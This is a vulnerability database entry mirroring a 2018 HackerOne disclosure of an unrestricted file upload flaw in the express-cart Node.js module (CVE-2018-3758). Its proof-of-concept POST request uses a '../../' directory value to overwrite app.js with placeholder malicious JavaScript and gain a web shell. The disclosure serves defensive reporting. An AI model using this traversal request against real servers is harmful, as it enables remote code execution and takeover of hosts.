Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeronePatrickrbcH1:343726
HistoryApr 26, 2018 - 9:54 p.m.

Node.js third-party modules: Unrestricted file upload (RCE)

2018-04-2621:54:11
patrickrbc
hackerone.com
829

EPSS

0.001

Percentile

36.3%

JSON

I would like to report an unrestricted file upload in express-cart.

It allows a user with administrative privileges to upload a file to any path.

Module

module name: express-cartversion:1.1.5npm page: https://www.npmjs.com/package/express-cart

Module Description

expressCart is a fully functional shopping cart built in Node.js (Express, MongoDB) with Stripe, PayPal and Authorize.net payments.

Vulnerability

Vulnerability Description

A privileged user can use the upload functionality to gain access to the server.

The application offers the possibility of uploading product images. However, there are many problems with the way it handles these uploads.

Firstly, it uses a path provided by the user. This path is not validated, therefore, it would allow the user to upload the file to any path on the hosting server.

Secondly, it does not restrict the type of the file being uploaded, therefore, it would allow the user to upload a malicious file to gain access to the server.

Finally, it does not restrict the size of the file. This would allow to easily exhaust the host resources and consequently produce a DoS.

Steps To Reproduce:

There are many ways this vulnerability could be exploited. Supposing our goal would be to establish access to the host machine, we could replace the app.js file with a malicious JavaScript that would give us a web shell.

Once you have administrator privileges you can use a request similar to:

POST /admin/file/upload HTTP/1.1
Host: localhost:1111
Referer: http://localhost:1111/
Content-Type: multipart/form-data; boundary=---------------------------1099055603892737061752875043
Cookie: [ADMINISTRATOR_COOKIE]

-----------------------------1099055603892737061752875043
Content-Disposition: form-data; name="upload_file"; filename="app.js"
Content-Type: image/png

[MALICIOUS_JAVASCRIPT]
-----------------------------1099055603892737061752875043
Content-Disposition: form-data; name="productId"

5ae2228d995e3e5d7c96474d
-----------------------------1099055603892737061752875043
Content-Disposition: form-data; name="directory"

../../
-----------------------------1099055603892737061752875043
Content-Disposition: form-data; name="saveButton"

-----------------------------1099055603892737061752875043--

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

Impact

This vulnerability would allow a privileged user to gain access in the hosting machine.

Related

prion 1
cvelist 1
cve 1
nvd 1
osv 1
github 1
veracode 1
prion
prion
Unrestricted file upload
2018-06-07 21:29:00
cvelist
cvelist
CVE-2018-3758
2018-06-07 21:00:00
cve
cve
CVE-2018-3758
2018-06-07 21:29:00
nvd
nvd
CVE-2018-3758
2018-06-07 21:29:00
osv
osv
express-cart unrestricted file upload vulnerability
2022-05-13 01:32:21
github
github
express-cart unrestricted file upload vulnerability
2022-05-13 01:32:21
veracode
veracode
Arbitrary File Upload
2018-06-04 05:24:40

EPSS

0.001

Percentile

36.3%

JSON
Related for H1:343726
prion1cvelist1cve1nvd1osv1github1veracode1